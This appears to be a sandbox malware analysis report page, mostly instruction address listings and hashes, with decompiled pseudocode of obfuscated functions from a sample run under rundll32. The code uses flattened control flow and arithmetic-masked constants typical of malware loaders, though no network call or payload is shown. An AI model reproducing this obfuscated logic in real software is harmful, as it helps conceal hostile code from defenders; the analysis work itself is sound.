                                                                                                                                    0x002d0491
                                                                                                                                    0x002d0496
                                                                                                                                    0x002d049e
                                                                                                                                    0x002d04a6
                                                                                                                                    0x002d04ae
                                                                                                                                    0x002d04b3
                                                                                                                                    0x002d04b8
                                                                                                                                    0x002d04c0
                                                                                                                                    0x002d04c8
                                                                                                                                    0x002d04d0
                                                                                                                                    0x002d04d8
                                                                                                                                    0x002d04e0
                                                                                                                                    0x002d04e8
                                                                                                                                    0x002d04f0
                                                                                                                                    0x002d04f8
                                                                                                                                    0x002d0500
                                                                                                                                    0x002d0508
                                                                                                                                    0x002d0510
                                                                                                                                    0x002d0518
                                                                                                                                    0x002d0520
                                                                                                                                    0x002d0528
                                                                                                                                    0x002d052d
                                                                                                                                    0x002d053b
                                                                                                                                    0x002d0540
                                                                                                                                    0x002d0546
                                                                                                                                    0x002d054e
                                                                                                                                    0x002d0553
                                                                                                                                    0x002d055b
                                                                                                                                    0x002d0560
                                                                                                                                    0x002d0564
                                                                                                                                    0x002d056c
                                                                                                                                    0x002d0578
                                                                                                                                    0x002d057d
                                                                                                                                    0x002d0583
                                                                                                                                    0x002d058b
                                                                                                                                    0x002d0593
                                                                                                                                    0x002d059b
                                                                                                                                    0x002d05a3
                                                                                                                                    0x002d05ab
                                                                                                                                    0x002d05b3
                                                                                                                                    0x002d05bb
                                                                                                                                    0x002d05c0
                                                                                                                                    0x002d05c8
                                                                                                                                    0x002d05d0
                                                                                                                                    0x002d05db
                                                                                                                                    0x002d05e6
                                                                                                                                    0x002d05f1
                                                                                                                                    0x002d05f9
                                                                                                                                    0x002d0601
                                                                                                                                    0x002d0609
                                                                                                                                    0x002d0615
                                                                                                                                    0x002d061a
                                                                                                                                    0x002d0624
                                                                                                                                    0x002d0627
                                                                                                                                    0x002d0634
                                                                                                                                    0x002d0637
                                                                                                                                    0x002d063b
                                                                                                                                    0x002d0643
                                                                                                                                    0x002d064e
                                                                                                                                    0x002d0656
                                                                                                                                    0x002d0661
                                                                                                                                    0x002d0671
                                                                                                                                    0x002d0675
                                                                                                                                    0x002d0681
                                                                                                                                    0x002d0686
                                                                                                                                    0x002d068c
                                                                                                                                    0x002d0694
                                                                                                                                    0x002d069c
                                                                                                                                    0x002d06a4
                                                                                                                                    0x002d06ac
                                                                                                                                    0x002d06b9
                                                                                                                                    0x002d06bc
                                                                                                                                    0x002d06c0
                                                                                                                                    0x002d06c8
                                                                                                                                    0x002d06d0
                                                                                                                                    0x002d06d8
                                                                                                                                    0x002d06e8
                                                                                                                                    0x002d06f0
                                                                                                                                    0x002d06f3
                                                                                                                                    0x002d06f7
                                                                                                                                    0x002d06ff
                                                                                                                                    0x002d0707
                                                                                                                                    0x002d070f
                                                                                                                                    0x002d0714
                                                                                                                                    0x002d0719
                                                                                                                                    0x002d071e
                                                                                                                                    0x002d0726
                                                                                                                                    0x002d072e
                                                                                                                                    0x002d0736
                                                                                                                                    0x002d073a
                                                                                                                                    0x002d0742
                                                                                                                                    0x002d074a
                                                                                                                                    0x002d0752
                                                                                                                                    0x002d075a
                                                                                                                                    0x002d075f
                                                                                                                                    0x002d0767
                                                                                                                                    0x002d076f
                                                                                                                                    0x002d0777
                                                                                                                                    0x002d077f
                                                                                                                                    0x002d0787
                                                                                                                                    0x002d078f
                                                                                                                                    0x002d0797
                                                                                                                                    0x002d079f
                                                                                                                                    0x002d07a7
                                                                                                                                    0x002d07af
                                                                                                                                    0x002d07b7
                                                                                                                                    0x002d07bf
                                                                                                                                    0x002d07c7
                                                                                                                                    0x002d07cc
                                                                                                                                    0x002d07d1
                                                                                                                                    0x002d07d6
                                                                                                                                    0x002d07de
                                                                                                                                    0x002d07e6
                                                                                                                                    0x002d07ee
                                                                                                                                    0x002d07f6
                                                                                                                                    0x002d07fe
                                                                                                                                    0x002d0806
                                                                                                                                    0x002d080e
                                                                                                                                    0x002d0818
                                                                                                                                    0x002d0820
                                                                                                                                    0x002d0828
                                                                                                                                    0x002d0830
                                                                                                                                    0x002d0838
                                                                                                                                    0x002d0845
                                                                                                                                    0x002d0849
                                                                                                                                    0x002d0851
                                                                                                                                    0x002d0859
                                                                                                                                    0x002d0859
                                                                                                                                    0x002d085f
                                                                                                                                    0x002d085f
                                                                                                                                    0x002d0864
                                                                                                                                    0x002d0864
                                                                                                                                    0x002d0866
                                                                                                                                    0x002d0985
                                                                                                                                    0x002d099f
                                                                                                                                    0x002d09a3
                                                                                                                                    0x002d09a8
                                                                                                                                    0x002d09ab
                                                                                                                                    0x002d09af
                                                                                                                                    0x002d09be
                                                                                                                                    0x00000000
                                                                                                                                    0x002d09b1
                                                                                                                                    0x002d09b3
                                                                                                                                    0x002d09b8
                                                                                                                                    0x00000000
                                                                                                                                    0x002d09b8
                                                                                                                                    0x002d086c
                                                                                                                                    0x002d0872
                                                                                                                                    0x002d091a
                                                                                                                                    0x002d0923
                                                                                                                                    0x002d0963
                                                                                                                                    0x002d0967
                                                                                                                                    0x002d0970
                                                                                                                                    0x002d0973
                                                                                                                                    0x002d0978
                                                                                                                                    0x002d09c0
                                                                                                                                    0x002d09c0
                                                                                                                                    0x002d09c6
                                                                                                                                    0x00000000
                                                                                                                                    0x002d0878
                                                                                                                                    0x002d087e
                                                                                                                                    0x002d08c7
                                                                                                                                    0x002d08c8
                                                                                                                                    0x002d08cb
                                                                                                                                    0x002d08cc
                                                                                                                                    0x002d08d1
                                                                                                                                    0x002d08d6
                                                                                                                                    0x002d08e9
                                                                                                                                    0x002d08f2
                                                                                                                                    0x002d08f7
                                                                                                                                    0x002d08fd
                                                                                                                                    0x002d0907
                                                                                                                                    0x002d0909
                                                                                                                                    0x002d090c
                                                                                                                                    0x002d090f
                                                                                                                                    0x002d0912
                                                                                                                                    0x002d085f
                                                                                                                                    0x00000000
                                                                                                                                    0x002d0880
                                                                                                                                    0x002d0882
                                                                                                                                    0x002d09e7
                                                                                                                                    0x002d09fa
                                                                                                                                    0x002d0888
                                                                                                                                    0x002d088e
                                                                                                                                    0x00000000
                                                                                                                                    0x002d0894
                                                                                                                                    0x002d08ae
                                                                                                                                    0x002d08b3
                                                                                                                                    0x002d088e
                                                                                                                                    0x002d0882
                                                                                                                                    0x002d087e
                                                                                                                                    0x002d0872
                                                                                                                                    0x002d0a04
                                                                                                                                    0x002d0a0d
                                                                                                                                    0x002d09cb
                                                                                                                                    0x002d09cb
                                                                                                                                    0x002d09cb
                                                                                                                                    0x00000000
                                                                                                                                    0x002d09d7
                                                                                                                                    0x002d085f

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: ,
                                                                                                                                    • API String ID: 0-2314114710
                                                                                                                                    • Opcode ID: 01d66c70488e0504f87d05ebc1bf9a3b11e3cbb59d65889b7737ae892446ab76
                                                                                                                                    • Instruction ID: aee26dd4f8a21117fe0beaadc6d2e3f8060ae88525a0f5ac3c2acc6013122e6d
                                                                                                                                    • Opcode Fuzzy Hash: 01d66c70488e0504f87d05ebc1bf9a3b11e3cbb59d65889b7737ae892446ab76
                                                                                                                                    • Instruction Fuzzy Hash: 91E13F715183809FD368CF25D58AA0BBBF2BBC4718F608A1DF59A86260C7B1D959CF42
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 100134F0 Relevance: 1.5, APIs: 1, Instructions: 11windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Iconic
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 110040809-0
                                                                                                                                    • Opcode ID: c62964fb237a153d00a9d951690d2dc04f1de6fa771c83c35e5bfac844c94462
                                                                                                                                    • Instruction ID: 838b9ee9edc54b62b4d2e1430c30368496747ad900502173d0e488298d75c8b4
                                                                                                                                    • Opcode Fuzzy Hash: c62964fb237a153d00a9d951690d2dc04f1de6fa771c83c35e5bfac844c94462
                                                                                                                                    • Instruction Fuzzy Hash: D6C012B0504208EB8704CB94D940C1977A8E74D30470002CCF80C83300D531AD008655
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 002D9EEC Relevance: 1.5, Strings: 1, Instructions: 226COMMONCrypto
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 98%
                                                                                                                                    			E002D9EEC() {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _t207;
				intOrPtr _t209;
				intOrPtr _t212;
				intOrPtr _t214;
				intOrPtr _t218;
				void* _t219;
				signed int _t221;
				signed int _t222;
				signed int _t223;
				signed int _t224;
				signed int _t225;
				signed int _t257;
				void* _t259;
				char _t263;
				void* _t264;
				void* _t266;

				_v64 = 0xd7ee0e;
				_t257 = 0x22;
				_v64 = _v64 / _t257;
				_v64 = _v64 + 0x89a9;
				_t219 = 0;
				_v64 = _v64 ^ 0x0000b335;
				_t259 = 0xb83ebc6;
				_v96 = 0xf5dfb6;
				_v96 = _v96 >> 6;
				_t221 = 0x26;
				_v96 = _v96 / _t221;
				_t222 = 0x2d;
				_v96 = _v96 * 0x58;
				_v96 = _v96 ^ 0x000b9251;
				_v60 = 0xd70e95;
				_v60 = _v60 >> 9;
				_v60 = _v60 + 0xffffe8b9;
				_v60 = _v60 ^ 0x00062b78;
				_v44 = 0xb641ac;
				_v44 = _v44 / _t222;
				_v44 = _v44 ^ 0x0002d028;
				_v52 = 0xbf8457;
				_t223 = 0x5d;
				_v52 = _v52 / _t223;
				_v52 = _v52 | 0xbb7661a2;
				_v52 = _v52 ^ 0xbb710206;
				_v80 = 0x47b11a;
				_v80 = _v80 ^ 0xc2c4229c;
				_t224 = 0x18;
				_v80 = _v80 / _t224;
				_v80 = _v80 + 0xffff1c96;
				_v80 = _v80 ^ 0x08184a4c;
				_v36 = 0x40dca8;
				_v36 = _v36 + 0x3144;
				_v36 = _v36 ^ 0x004d2780;
				_v40 = 0xec5297;
				_v40 = _v40 * 0x45;
				_v40 = _v40 ^ 0x3fbac2f2;
				_v72 = 0x18b121;
				_v72 = _v72 >> 1;
				_v72 = _v72 * 0x1e;
				_v72 = _v72 + 0xfd79;
				_v72 = _v72 ^ 0x0173ec5f;
				_v76 = 0xd8cc67;
				_v76 = _v76 >> 2;
				_v76 = _v76 >> 0xd;
				_v76 = _v76 * 0x23;
				_v76 = _v76 ^ 0x000d42f3;
				_v88 = 0x5f1bd9;
				_v88 = _v88 + 0x89b3;
				_v88 = _v88 ^ 0xee5f73f3;
				_v88 = _v88 ^ 0xfa82a5ad;
				_v88 = _v88 ^ 0x14801a76;
				_v92 = 0x778c42;
				_t225 = 0x6d;
				_v92 = _v92 * 0x69;
				_v92 = _v92 << 0xb;
				_v92 = _v92 | 0xba472be1;
				_v92 = _v92 ^ 0xfe7d7315;
				_v56 = 0x5dd318;
				_v56 = _v56 / _t257;
				_v56 = _v56 << 0xc;
				_v56 = _v56 ^ 0x2c2721c6;
				_v84 = 0xd870dc;
				_v84 = _v84 >> 0x10;
				_v84 = _v84 | 0x1345b487;
				_v84 = _v84 * 0x5a;
				_v84 = _v84 ^ 0xc68bf031;
				_v48 = 0x9a419e;
				_v48 = _v48 | 0xfa3afde2;
				_v48 = _v48 ^ 0xfabdbed6;
				_v32 = 0x7a1ab;
				_v32 = _v32 / _t225;
				_v32 = _v32 ^ 0x000f5e95;
				_v68 = 0x67bbab;
				_v68 = _v68 + 0xffffccf8;
				_v68 = _v68 ^ 0x5c1ded32;
				_v68 = _v68 << 0xd;
				_v68 = _v68 ^ 0x4cb92f41;
				_t263 = _v28;
				_t258 = _v28;
				goto L1;
				do {
					while(1) {
						L1:
						_t266 = _t259 - 0xc23b37f;
						if(_t266 > 0) {
							break;
						}
						if(_t266 == 0) {
							E002D8519(_v56, _v84, _v24);
							_t259 = 0xdb1153f;
							continue;
						}
						if(_t259 == 0xab8c2) {
							_t209 =  *0x2e3e10; // 0x0
							E002C8ECE(_v8 + 1, _t209 + 0x1c, _v12, _v92);
							_t212 =  *0x2e3e10; // 0x0
							_t234 = _v16;
							_t264 = _t264 + 0xc;
							_t219 = 1;
							_t259 = 0xc23b37f;
							 *((intOrPtr*)(_t212 + 0xc)) = _v16;
							continue;
						}
						if(_t259 == 0x26dca52) {
							_t234 = _v96;
							_t214 = E002CA9CE(_v96, _t263,  &_v28, _v60, _v44);
							_t258 = _t214;
							_t264 = _t264 + 0xc;
							if(_t214 == 0) {
								goto L22;
							}
							_t259 = 0xe747a68;
							continue;
						}
						if(_t259 == 0xa9b692f) {
							_t263 = E002CF899(_t234);
							_t259 = 0x26dca52;
							continue;
						}
						if(_t259 != 0xb83ebc6) {
							goto L21;
						} else {
							_t259 = 0xa9b692f;
							continue;
						}
					}
					if(_t259 == 0xdb1153f) {
						E002C4E7D(_v48, _v32, _t258, _v68);
						_t259 = 0xdb3b1d3;
						goto L21;
					}
					if(_t259 == 0xe566670) {
						_t207 = E002D894B( &_v16,  &_v24, _v36, _v40, _v72, _v76);
						_t264 = _t264 + 0x10;
						asm("sbb esi, esi");
						_t259 = ( ~_t207 & 0xf3e70543) + 0xc23b37f;
						goto L1;
					}
					if(_t259 != 0xe747a68) {
						goto L21;
					}
					_t259 = 0xdb1153f;
					if(_v28 > 2) {
						_t218 = E002C4346( &_v20, _v52,  *((intOrPtr*)(_t258 + 8)), _v80);
						_v24 = _t218;
						_pop(_t234);
						if(_t218 != 0) {
							_t259 = 0xe566670;
						}
					}
					goto L1;
					L21:
				} while (_t259 != 0xdb3b1d3);
				L22:
				return _t219;
			}










































                                                                                                                                    0x002d9eef
                                                                                                                                    0x002d9f03
                                                                                                                                    0x002d9f08
                                                                                                                                    0x002d9f0e
                                                                                                                                    0x002d9f16
                                                                                                                                    0x002d9f18
                                                                                                                                    0x002d9f20
                                                                                                                                    0x002d9f25
                                                                                                                                    0x002d9f2d
                                                                                                                                    0x002d9f36
                                                                                                                                    0x002d9f3b
                                                                                                                                    0x002d9f46
                                                                                                                                    0x002d9f49
                                                                                                                                    0x002d9f4d
                                                                                                                                    0x002d9f55
                                                                                                                                    0x002d9f5d
                                                                                                                                    0x002d9f62
                                                                                                                                    0x002d9f6a
                                                                                                                                    0x002d9f72
                                                                                                                                    0x002d9f82
                                                                                                                                    0x002d9f86
                                                                                                                                    0x002d9f8e
                                                                                                                                    0x002d9f9a
                                                                                                                                    0x002d9f9f
                                                                                                                                    0x002d9fa5
                                                                                                                                    0x002d9fad
                                                                                                                                    0x002d9fb5
                                                                                                                                    0x002d9fbd
                                                                                                                                    0x002d9fc9
                                                                                                                                    0x002d9fcc
                                                                                                                                    0x002d9fd0
                                                                                                                                    0x002d9fd8
                                                                                                                                    0x002d9fe0
                                                                                                                                    0x002d9fe8
                                                                                                                                    0x002d9ff0
                                                                                                                                    0x002d9ff8
                                                                                                                                    0x002da005
                                                                                                                                    0x002da009
                                                                                                                                    0x002da011
                                                                                                                                    0x002da019
                                                                                                                                    0x002da022
                                                                                                                                    0x002da026
                                                                                                                                    0x002da02e
                                                                                                                                    0x002da036
                                                                                                                                    0x002da03e
                                                                                                                                    0x002da043
                                                                                                                                    0x002da04d
                                                                                                                                    0x002da051
                                                                                                                                    0x002da059
                                                                                                                                    0x002da061
                                                                                                                                    0x002da069
                                                                                                                                    0x002da071
                                                                                                                                    0x002da079
                                                                                                                                    0x002da081
                                                                                                                                    0x002da092
                                                                                                                                    0x002da093
                                                                                                                                    0x002da097
                                                                                                                                    0x002da09c
                                                                                                                                    0x002da0a4
                                                                                                                                    0x002da0ac
                                                                                                                                    0x002da0bc
                                                                                                                                    0x002da0c0
                                                                                                                                    0x002da0c5
                                                                                                                                    0x002da0cd
                                                                                                                                    0x002da0d5
                                                                                                                                    0x002da0da
                                                                                                                                    0x002da0e7
                                                                                                                                    0x002da0eb
                                                                                                                                    0x002da0f3
                                                                                                                                    0x002da0fb
                                                                                                                                    0x002da103
                                                                                                                                    0x002da10b
                                                                                                                                    0x002da119
                                                                                                                                    0x002da11d
                                                                                                                                    0x002da125
                                                                                                                                    0x002da12d
                                                                                                                                    0x002da135
                                                                                                                                    0x002da13d
                                                                                                                                    0x002da142
                                                                                                                                    0x002da14a
                                                                                                                                    0x002da14e
                                                                                                                                    0x002da14e
                                                                                                                                    0x002da152
                                                                                                                                    0x002da152
                                                                                                                                    0x002da152
                                                                                                                                    0x002da152
                                                                                                                                    0x002da158
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x002da15e
                                                                                                                                    0x002da216
                                                                                                                                    0x002da21c
                                                                                                                                    0x00000000
                                                                                                                                    0x002da21c
                                                                                                                                    0x002da16a
                                                                                                                                    0x002da1d5
                                                                                                                                    0x002da1e9
                                                                                                                                    0x002da1ee
                                                                                                                                    0x002da1f5
                                                                                                                                    0x002da1f9
                                                                                                                                    0x002da1fc
                                                                                                                                    0x002da1fd
                                                                                                                                    0x002da202
                                                                                                                                    0x00000000
                                                                                                                                    0x002da202
                                                                                                                                    0x002da172
                                                                                                                                    0x002da1af
                                                                                                                                    0x002da1b4
                                                                                                                                    0x002da1b9
                                                                                                                                    0x002da1bb
                                                                                                                                    0x002da1c0
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x002da1c6
                                                                                                                                    0x00000000
                                                                                                                                    0x002da1c6
                                                                                                                                    0x002da17a
                                                                                                                                    0x002da198
                                                                                                                                    0x002da19a
                                                                                                                                    0x00000000
                                                                                                                                    0x002da19a
                                                                                                                                    0x002da182
                                                                                                                                    0x00000000
                                                                                                                                    0x002da188
                                                                                                                                    0x002da188
                                                                                                                                    0x00000000
                                                                                                                                    0x002da188
                                                                                                                                    0x002da182
                                                                                                                                    0x002da22c
                                                                                                                                    0x002da2c6
                                                                                                                                    0x002da2cd
                                                                                                                                    0x00000000
                                                                                                                                    0x002da2cd
                                                                                                                                    0x002da238
                                                                                                                                    0x002da29a
                                                                                                                                    0x002da29f
                                                                                                                                    0x002da2a6
                                                                                                                                    0x002da2ae
                                                                                                                                    0x00000000
                                                                                                                                    0x002da2ae
                                                                                                                                    0x002da240
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x002da24b
                                                                                                                                    0x002da250
                                                                                                                                    0x002da265
                                                                                                                                    0x002da26a
                                                                                                                                    0x002da26f
                                                                                                                                    0x002da272
                                                                                                                                    0x002da278
                                                                                                                                    0x002da278
                                                                                                                                    0x002da272
                                                                                                                                    0x00000000
                                                                                                                                    0x002da2d2
                                                                                                                                    0x002da2d2
                                                                                                                                    0x002da2e1
                                                                                                                                    0x002da2e7

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: D1
                                                                                                                                    • API String ID: 0-2215811268
                                                                                                                                    • Opcode ID: 5a9b6df84dd1e6678d31a213cb3fdfc415a21e89e58e306b4bfab1e074da6704
                                                                                                                                    • Instruction ID: ae667547c1c02ba620d0ded123c2893a72b8bc11b741e8d7284ad44579926918
                                                                                                                                    • Opcode Fuzzy Hash: 5a9b6df84dd1e6678d31a213cb3fdfc415a21e89e58e306b4bfab1e074da6704
                                                                                                                                    • Instruction Fuzzy Hash: 9BA142729183018FC318CF65C58981BBBF1BBC4358F54892EF5A996220D7B5CA598F87
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 002DBB23 Relevance: 1.4, Strings: 1, Instructions: 173COMMONCrypto
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 86%
                                                                                                                                    			E002DBB23(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				void* _v12;
				intOrPtr _v16;
				char _v20;
				signed int _v24;
				signed int _v28;
				unsigned int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				void* _t138;
				intOrPtr _t161;
				void* _t162;
				void* _t164;
				signed int _t181;
				signed int _t182;
				signed int _t183;
				void* _t185;
				signed int* _t189;

				_t162 = __ecx;
				_push(1);
				_push(1);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E002D20B9(_t138);
				_v16 = 0xdfc885;
				_t189 =  &(( &_v76)[8]);
				asm("stosd");
				_t185 = 0;
				_t164 = 0xcc97672;
				asm("stosd");
				asm("stosd");
				_v32 = 0x60c2fa;
				_v32 = _v32 >> 3;
				_v32 = _v32 ^ 0x00046f58;
				_v76 = 0xb548f0;
				_v76 = _v76 >> 0xc;
				_t181 = 0xc;
				_v76 = _v76 * 0x3c;
				_v76 = _v76 + 0xffff64d0;
				_v76 = _v76 ^ 0x0001fd54;
				_v52 = 0x15927a;
				_v52 = _v52 / _t181;
				_v52 = _v52 ^ 0x000151ae;
				_v56 = 0xd6ed9;
				_t182 = 0x1a;
				_v56 = _v56 * 0x3f;
				_v56 = _v56 + 0xfffffbb4;
				_v56 = _v56 ^ 0x0345d46e;
				_v64 = 0xba2b53;
				_v64 = _v64 * 0x6d;
				_v64 = _v64 ^ 0x73d6d9cf;
				_v64 = _v64 * 0x31;
				_v64 = _v64 ^ 0x981330b4;
				_v60 = 0x269f8;
				_v60 = _v60 >> 5;
				_v60 = _v60 + 0xffffb859;
				_v60 = _v60 ^ 0xfff00afd;
				_v68 = 0xfd9147;
				_v68 = _v68 ^ 0x8de1643f;
				_v68 = _v68 / _t182;
				_v68 = _v68 >> 0xf;
				_v68 = _v68 ^ 0x000df039;
				_v72 = 0x5def36;
				_v72 = _v72 | 0xd620e1c7;
				_v72 = _v72 + 0xd307;
				_t183 = 0x48;
				_v72 = _v72 / _t183;
				_v72 = _v72 ^ 0x02f0e4dc;
				_v24 = 0xf7704c;
				_v24 = _v24 + 0x27dd;
				_v24 = _v24 ^ 0x00ff74b2;
				_v28 = 0x151ed9;
				_v28 = _v28 * 0x48;
				_v28 = _v28 ^ 0x05f046e2;
				_v36 = 0xddc4df;
				_v36 = _v36 >> 0xf;
				_v36 = _v36 | 0x7f83127d;
				_v36 = _v36 ^ 0x7f8e5ab1;
				_v40 = 0x29fd7f;
				_v40 = _v40 >> 7;
				_v40 = _v40 | 0x8d3b2756;
				_v40 = _v40 ^ 0x8d37b79a;
				_v44 = 0x8dc5a8;
				_v44 = _v44 * 0x63;
				_v44 = _v44 >> 4;
				_v44 = _v44 ^ 0x036b3557;
				_v48 = 0xd61f7e;
				_v48 = _v48 | 0xd43d52c3;
				_v48 = _v48 + 0xa376;
				_v48 = _v48 ^ 0xd504b7b0;
				_t184 = _v20;
				while(_t164 != 0x2524be6) {
					if(_t164 == 0xcc97672) {
						_t164 = 0xe41debb;
						continue;
					} else {
						if(_t164 == 0xdd773d9) {
							if(E002DD8EC(_v52, _v56,  &_v20, _t184) != 0) {
								_t164 = 0xe01b1ec;
								continue;
							}
						} else {
							if(_t164 == 0xe01b1ec) {
								E002E0AC8(_v64, _v60, 1, _v68, _v20, _v72, _a12, _t162, _v24, 1, _t164, _v28);
								_t189 =  &(_t189[0xa]);
								_t164 = 0x2524be6;
								_t185 =  !=  ? 1 : _t185;
								continue;
							} else {
								if(_t164 != 0xe41debb) {
									L13:
									if(_t164 != 0x78a313b) {
										continue;
									}
								} else {
									_t161 = E002C3DE2(_t164);
									_t184 = _t161;
									if(_t161 != 0xffffffff) {
										_t164 = 0xdd773d9;
										continue;
									}
								}
							}
						}
					}
					return _t185;
				}
				E002D1E67(_v36, _v40, _v44, _v48, _v20);
				_t189 =  &(_t189[3]);
				_t164 = 0x78a313b;
				goto L13;
			}





























                                                                                                                                    0x002dbb2c
                                                                                                                                    0x002dbb2f
                                                                                                                                    0x002dbb30
                                                                                                                                    0x002dbb31
                                                                                                                                    0x002dbb35
                                                                                                                                    0x002dbb39
                                                                                                                                    0x002dbb3d
                                                                                                                                    0x002dbb41
                                                                                                                                    0x002dbb42
                                                                                                                                    0x002dbb43
                                                                                                                                    0x002dbb48
                                                                                                                                    0x002dbb56
                                                                                                                                    0x002dbb59
                                                                                                                                    0x002dbb5c
                                                                                                                                    0x002dbb5e
                                                                                                                                    0x002dbb65
                                                                                                                                    0x002dbb66
                                                                                                                                    0x002dbb67
                                                                                                                                    0x002dbb6f
                                                                                                                                    0x002dbb74
                                                                                                                                    0x002dbb7c
                                                                                                                                    0x002dbb84
                                                                                                                                    0x002dbb8e
                                                                                                                                    0x002dbb91
                                                                                                                                    0x002dbb95
                                                                                                                                    0x002dbb9d
                                                                                                                                    0x002dbba5
                                                                                                                                    0x002dbbbd
                                                                                                                                    0x002dbbc1
                                                                                                                                    0x002dbbc9
                                                                                                                                    0x002dbbd6
                                                                                                                                    0x002dbbd9
                                                                                                                                    0x002dbbdd
                                                                                                                                    0x002dbbe5
                                                                                                                                    0x002dbbed
                                                                                                                                    0x002dbbfa
                                                                                                                                    0x002dbbfe
                                                                                                                                    0x002dbc0b
                                                                                                                                    0x002dbc0f
                                                                                                                                    0x002dbc17
                                                                                                                                    0x002dbc1f
                                                                                                                                    0x002dbc24
                                                                                                                                    0x002dbc2c
                                                                                                                                    0x002dbc34
                                                                                                                                    0x002dbc3c
                                                                                                                                    0x002dbc4c
                                                                                                                                    0x002dbc50
                                                                                                                                    0x002dbc55
                                                                                                                                    0x002dbc5d
                                                                                                                                    0x002dbc65
                                                                                                                                    0x002dbc6d
                                                                                                                                    0x002dbc79
                                                                                                                                    0x002dbc7c
                                                                                                                                    0x002dbc80
                                                                                                                                    0x002dbc88
                                                                                                                                    0x002dbc90
                                                                                                                                    0x002dbc98
                                                                                                                                    0x002dbca0
                                                                                                                                    0x002dbcad
                                                                                                                                    0x002dbcb1
                                                                                                                                    0x002dbcb9
                                                                                                                                    0x002dbcc1
                                                                                                                                    0x002dbcc6
                                                                                                                                    0x002dbcce
                                                                                                                                    0x002dbcd6
                                                                                                                                    0x002dbcde
                                                                                                                                    0x002dbce3
                                                                                                                                    0x002dbceb
                                                                                                                                    0x002dbcf3
                                                                                                                                    0x002dbd00
                                                                                                                                    0x002dbd04
                                                                                                                                    0x002dbd09
                                                                                                                                    0x002dbd11
                                                                                                                                    0x002dbd19
                                                                                                                                    0x002dbd21
                                                                                                                                    0x002dbd29
                                                                                                                                    0x002dbd31
                                                                                                                                    0x002dbd35
                                                                                                                                    0x002dbd47
                                                                                                                                    0x002dbde6
                                                                                                                                    0x00000000
                                                                                                                                    0x002dbd4d
                                                                                                                                    0x002dbd53
                                                                                                                                    0x002dbdda
                                                                                                                                    0x002dbddc
                                                                                                                                    0x00000000
                                                                                                                                    0x002dbddc
                                                                                                                                    0x002dbd55
                                                                                                                                    0x002dbd5b
                                                                                                                                    0x002dbdac
                                                                                                                                    0x002dbdb1
                                                                                                                                    0x002dbdb4
                                                                                                                                    0x002dbdbb
                                                                                                                                    0x00000000
                                                                                                                                    0x002dbd5d
                                                                                                                                    0x002dbd63
                                                                                                                                    0x002dbe11
                                                                                                                                    0x002dbe17
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x002dbd69
                                                                                                                                    0x002dbd71
                                                                                                                                    0x002dbd76
                                                                                                                                    0x002dbd7b
                                                                                                                                    0x002dbd81
